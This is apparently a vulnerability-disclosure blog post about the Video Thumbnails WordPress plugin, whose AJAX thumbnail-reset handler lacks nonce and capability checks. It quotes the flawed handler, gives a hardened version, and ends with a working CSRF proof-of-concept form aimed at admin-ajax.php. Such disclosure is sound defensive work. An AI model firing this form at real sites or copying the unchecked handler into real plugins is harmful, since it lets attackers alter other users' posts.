4 Nov 2022

Privilege Escalation Vulnerability in Video Thumbnails WordPress Plugin

Earlier this week the WordPress plugin Video Thumbnails was closed on the WordPress Plugin Directory. As that plugin is one of the 1,000 most popular plugins, we were alerted to its closure. No reason has been given for the closure. But there are multiple minor security vulnerabilities in the latest version.

As one example of those vulnerabilities, the functionality for “resetting a video thumbnail” is accessible to anyone logged in to WordPress, instead of only to someone who is editing the relevant post related to a video thumbnail.

The plugin registers the function that handles that, ajax_reset_callback(), to be accessible through WordPress’ AJAX functionality:

add_action( 'wp_ajax_reset_video_thumbnail', array( &$this, 'ajax_reset_callback' ) );

That function, which is located in the file /video-thumbnails.php, doesn’t have any security checks in place:

function ajax_reset_callback() {
	global $wpdb; // this is how you get access to the database

	// No nonce check (CSRF) and no capability check (privilege escalation):
	// any logged in user, or a page they are tricked into visiting, reaches this point.
	$post_id = $_POST['post_id'];

	delete_post_meta( $post_id, VIDEO_THUMBNAILS_FIELD );

	$video_thumbnail = get_video_thumbnail( $post_id );

	if ( is_wp_error( $video_thumbnail ) ) {
		echo $video_thumbnail->get_error_message();
	} else if ( $video_thumbnail != null ) {
		echo '<img src="' . $video_thumbnail . '" style="max-width:100%;" />';
	} else {
		echo __( 'No video thumbnail for this post.', 'video-thumbnails' );
	}

	die();
}

So anyone logged in to WordPress can access that functionality, which is privilege escalation, and an attacker could cause someone who is logged in to access that without intending it, which is cross-site request forgery (CSRF).
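As an added illustration (this is not the plugin's code and not a fix released by its developer), here is how the same handler looks with the two checks WordPress provides for exactly these issues: a nonce check, which stops the CSRF, and a per-post capability check, which stops the privilege escalation. The nonce action name, the `nonce` POST field, the function names and the script handle are assumptions chosen for this example; `VIDEO_THUMBNAILS_FIELD` and `get_video_thumbnail()` are the plugin's own.

```php
<?php
// Added example, not the plugin's own code. Assumes the plugin's existing
// VIDEO_THUMBNAILS_FIELD constant and get_video_thumbnail() function.
// The nonce action 'video_thumbnails_reset' and the script handle
// 'video-thumbnails-admin' are assumptions for this example.

// Hand the nonce to the admin-side JavaScript that sends the AJAX request.
function video_thumbnails_example_enqueue() {
	wp_enqueue_script( 'video-thumbnails-admin' ); // handle is an assumption
	wp_localize_script( 'video-thumbnails-admin', 'videoThumbnailsAjax', array(
		'nonce' => wp_create_nonce( 'video_thumbnails_reset' ),
	) );
}
add_action( 'admin_enqueue_scripts', 'video_thumbnails_example_enqueue' );

function video_thumbnails_example_reset_callback() {
	// 1. CSRF protection: the POST field 'nonce' must hold a valid nonce for this
	//    action. check_ajax_referer() terminates the request when it is missing or invalid.
	check_ajax_referer( 'video_thumbnails_reset', 'nonce' );

	// 2. Input validation: post_id must be a positive integer naming an existing post.
	$post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;
	if ( ! $post_id || ! get_post( $post_id ) ) {
		wp_send_json_error( 'Invalid post ID.', 400 );
	}

	// 3. Authorization: only a user allowed to edit this specific post may reset
	//    its thumbnail. A Subscriber fails this check; so does an Author for a
	//    post that belongs to someone else.
	if ( ! current_user_can( 'edit_post', $post_id ) ) {
		wp_send_json_error( 'You are not allowed to edit this post.', 403 );
	}

	delete_post_meta( $post_id, VIDEO_THUMBNAILS_FIELD );
	$video_thumbnail = get_video_thumbnail( $post_id );

	if ( is_wp_error( $video_thumbnail ) ) {
		echo esc_html( $video_thumbnail->get_error_message() );
	} elseif ( $video_thumbnail != null ) {
		// Escape the URL before placing it inside an attribute.
		echo '<img src="' . esc_url( $video_thumbnail ) . '" style="max-width:100%;" />';
	} else {
		echo esc_html__( 'No video thumbnail for this post.', 'video-thumbnails' );
	}

	wp_die();
}
add_action( 'wp_ajax_reset_video_thumbnail', 'video_thumbnails_example_reset_callback' );
```

The capability check uses `edit_post` with the post ID rather than `is_user_logged_in()` or a role name, because the question the handler has to answer is not "is this a user" but "may this user change this post". The nonce only works if the JavaScript actually sends it, which is why the enqueue function above passes it to the script; with these checks in place, the proof of concept form below is rejected before `delete_post_meta()` runs.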

WordPress Causes Full Disclosure

In protest of the WordPress Support Forum moderators’ continued inappropriate behavior, we changed from reasonably disclosing to fully disclosing vulnerabilities in plugins in the WordPress Plugin Directory until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about it for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)

You can notify the developer of this issue on the forum as well.

After four years, the moderators have finally tacitly admitted they were behaving inappropriately and have made moves to fix the problems (though incompletely), so these full disclosures can be ended if they simply restore access to our accounts and plugins in the Plugin Directory. Hopefully that takes less than four years.

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Proof of Concept

The following proof of concept will reset the video thumbnail for the post with ID 1, when logged in to WordPress as a Subscriber.

Replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=reset_video_thumbnail" method="POST">
<input type="hidden" name="post_id" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
